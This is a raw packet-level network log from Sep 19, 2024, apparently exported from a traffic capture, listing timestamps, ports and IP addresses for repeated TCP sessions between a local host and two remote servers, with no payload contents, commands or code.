Sep 19, 2024 02:26:39.805870056 CEST	39001	49822	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:39.808731079 CEST	49822	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:39.813568115 CEST	39001	49822	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.146522999 CEST	39001	49822	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.146680117 CEST	49822	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.146802902 CEST	49822	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.151515961 CEST	39001	49822	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.267035007 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.272067070 CEST	39001	49823	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.272213936 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.305871964 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.310656071 CEST	39001	49823	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.314207077 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.319017887 CEST	39001	49823	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.616851091 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.625616074 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.626200914 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.634651899 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.909053087 CEST	39001	49823	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.909116983 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.909250021 CEST	49823	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:40.914679050 CEST	39001	49823	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:40.988301992 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.056166887 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.107341051 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.112903118 CEST	39001	49824	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.112994909 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.127976894 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.129472971 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.134247065 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.134308100 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.139065981 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.167685986 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.172652006 CEST	39001	49824	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.172724962 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.177532911 CEST	39001	49824	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.794229031 CEST	39001	49824	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:41.794378996 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.845525980 CEST	49824	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:41.850405931 CEST	39001	49824	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:42.455044031 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:42.459883928 CEST	39001	49825	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:42.460088968 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:42.517246008 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:42.522070885 CEST	39001	49825	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:42.524950981 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:42.529725075 CEST	39001	49825	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:43.511101007 CEST	39001	49825	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:43.511163950 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.511270046 CEST	49825	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.516454935 CEST	39001	49825	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:43.626563072 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.631685972 CEST	39001	49826	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:43.631769896 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.656405926 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.661580086 CEST	39001	49826	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:43.661636114 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:43.666388988 CEST	39001	49826	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:44.264146090 CEST	39001	49826	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:44.264244080 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:44.264478922 CEST	49826	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:44.269316912 CEST	39001	49826	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:44.377084017 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:44.382999897 CEST	39001	49827	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:44.383145094 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:45.787940025 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:45.792916059 CEST	39001	49827	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:45.793042898 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:45.797854900 CEST	39001	49827	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:46.134248972 CEST	39001	49827	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:46.136713028 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.136806011 CEST	49827	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.142167091 CEST	39001	49827	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:46.251389027 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.256302118 CEST	39001	49828	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:46.256449938 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.707886934 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.712903023 CEST	39001	49828	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:46.720453978 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:46.725269079 CEST	39001	49828	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.061846018 CEST	39001	49828	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.061899900 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.062031984 CEST	49828	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.066837072 CEST	39001	49828	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.173121929 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.178010941 CEST	39001	49829	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.180329084 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.218980074 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.223843098 CEST	39001	49829	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.223896027 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.228735924 CEST	39001	49829	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.836146116 CEST	39001	49829	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:47.836249113 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.839718103 CEST	49829	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:47.844482899 CEST	39001	49829	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:48.297971010 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:48.302845955 CEST	39001	49830	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:48.303399086 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.124300957 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.134218931 CEST	39001	49830	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.136334896 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.141239882 CEST	39001	49830	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.564851999 CEST	39001	49830	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.564914942 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.565077066 CEST	49830	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.569856882 CEST	39001	49830	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.673116922 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.678210974 CEST	39001	49831	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.680207968 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.711782932 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.716777086 CEST	39001	49831	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:49.719913006 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:49.724771976 CEST	39001	49831	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:50.337287903 CEST	39001	49831	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:50.340255976 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:50.369529009 CEST	49831	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:50.374449015 CEST	39001	49831	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:50.550021887 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:50.554984093 CEST	39001	49832	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:50.558228970 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.337068081 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.641256094 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.656187057 CEST	39001	49832	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:51.656235933 CEST	39001	49832	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:51.875193119 CEST	39001	49832	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:51.876529932 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.876637936 CEST	49832	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.881447077 CEST	39001	49832	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:51.985593081 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:51.991028070 CEST	39001	49833	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:51.994225979 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.027000904 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.032960892 CEST	39001	49833	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.033052921 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.040319920 CEST	39001	49833	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.674165964 CEST	39001	49833	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.678340912 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.678342104 CEST	49833	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.683341980 CEST	39001	49833	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.783106089 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.788228035 CEST	39001	49834	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.790235996 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.922676086 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.927676916 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:52.928627968 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:52.933540106 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:53.530852079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:53.656747103 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:53.716418982 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:53.722882986 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:53.728799105 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:53.728857040 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:53.733889103 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.197087049 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:54.202018976 CEST	39001	49834	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.202220917 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:54.207024097 CEST	39001	49834	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.565002918 CEST	39001	49834	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.565078020 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:54.565177917 CEST	49834	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:54.570050955 CEST	39001	49834	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.678199053 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:54.683211088 CEST	39001	49836	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:54.683286905 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:55.426896095 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:55.563684940 CEST	39001	49836	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:55.563918114 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:55.568949938 CEST	39001	49836	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:56.054172993 CEST	39001	49836	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:56.058254004 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:56.058336020 CEST	49836	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:56.063215017 CEST	39001	49836	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:56.193053961 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:56.198163986 CEST	39001	49837	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:56.198255062 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:56.409666061 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:26:56.531769991 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:26:57.179866076 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.187653065 CEST	39001	49837	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.190217018 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.195141077 CEST	39001	49837	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.587197065 CEST	39001	49837	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.587292910 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.587444067 CEST	49837	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.593161106 CEST	39001	49837	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.705621958 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.750790119 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.883951902 CEST	39001	49838	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.883992910 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.884165049 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.884164095 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.889110088 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.910758018 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.915661097 CEST	39001	49838	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:57.915746927 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:57.920620918 CEST	39001	49838	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.268563986 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.322849035 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.409221888 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.413042068 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.417932034 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.418107033 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.423026085 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.679065943 CEST	39001	49838	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.679172039 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.679368019 CEST	49838	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.684262037 CEST	39001	49838	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.798245907 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.803356886 CEST	39001	49839	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.803450108 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.830764055 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.835659981 CEST	39001	49839	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:58.835731983 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:58.840523005 CEST	39001	49839	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:59.490849972 CEST	39001	49839	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:59.490932941 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.491070032 CEST	49839	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.496105909 CEST	39001	49839	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:59.595031023 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.600056887 CEST	39001	49840	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:59.602220058 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.614922047 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.619860888 CEST	39001	49840	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:59.622200966 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:59.627115011 CEST	39001	49840	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:00.271678925 CEST	39001	49840	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:00.274275064 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.274389982 CEST	49840	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.279207945 CEST	39001	49840	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:00.392580986 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.397541046 CEST	39001	49841	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:00.397634029 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.412095070 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.416939020 CEST	39001	49841	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:00.417022943 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:00.421842098 CEST	39001	49841	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.037447929 CEST	39001	49841	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.037794113 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.038131952 CEST	49841	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.042855978 CEST	39001	49841	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.110424995 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:27:01.147423983 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.152400970 CEST	39001	49842	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.155014992 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.259702921 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.264527082 CEST	39001	49842	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.264734983 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.269556046 CEST	39001	49842	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.353996038 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:27:01.812253952 CEST	39001	49842	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:01.813647032 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.879636049 CEST	49842	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:01.884443998 CEST	39001	49842	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.039403915 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.044369936 CEST	39001	49843	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.044466019 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.301099062 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.305974960 CEST	39001	49843	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.306051016 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.310878992 CEST	39001	49843	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.683737993 CEST	39001	49843	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.683799982 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.683964968 CEST	49843	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.688813925 CEST	39001	49843	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.799129963 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.804389954 CEST	39001	49844	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.804476023 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.831994057 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.836946964 CEST	39001	49844	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:02.837052107 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:02.841980934 CEST	39001	49844	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:03.458682060 CEST	39001	49844	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:03.458802938 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.459407091 CEST	49844	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.464171886 CEST	39001	49844	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:03.565541029 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.570524931 CEST	39001	49845	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:03.570677042 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.583528042 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.588416100 CEST	39001	49845	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:03.588540077 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:03.593358040 CEST	39001	49845	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:04.249170065 CEST	39001	49845	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:04.249386072 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.249492884 CEST	49845	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.254358053 CEST	39001	49845	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:04.360925913 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.365971088 CEST	39001	49846	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:04.366056919 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.379813910 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.384748936 CEST	39001	49846	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:04.384807110 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:04.389652967 CEST	39001	49846	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.005384922 CEST	39001	49846	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.010078907 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.010078907 CEST	49846	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.014944077 CEST	39001	49846	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.153018951 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.158080101 CEST	39001	49847	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.158273935 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.176445007 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.181315899 CEST	39001	49847	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.184477091 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.189328909 CEST	39001	49847	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.791408062 CEST	39001	49847	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.791718006 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.791906118 CEST	49847	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.796699047 CEST	39001	49847	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.908492088 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.913531065 CEST	39001	49848	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.913604021 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.930836916 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.935679913 CEST	39001	49848	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:05.935739040 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:05.940593958 CEST	39001	49848	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:06.565013885 CEST	39001	49848	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:06.565082073 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:06.630040884 CEST	49848	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:06.634877920 CEST	39001	49848	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:06.793991089 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:06.798924923 CEST	39001	49849	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:06.799020052 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.052700043 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.057645082 CEST	39001	49849	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:07.057766914 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.062561989 CEST	39001	49849	45.11.229.96	192.168.2.6
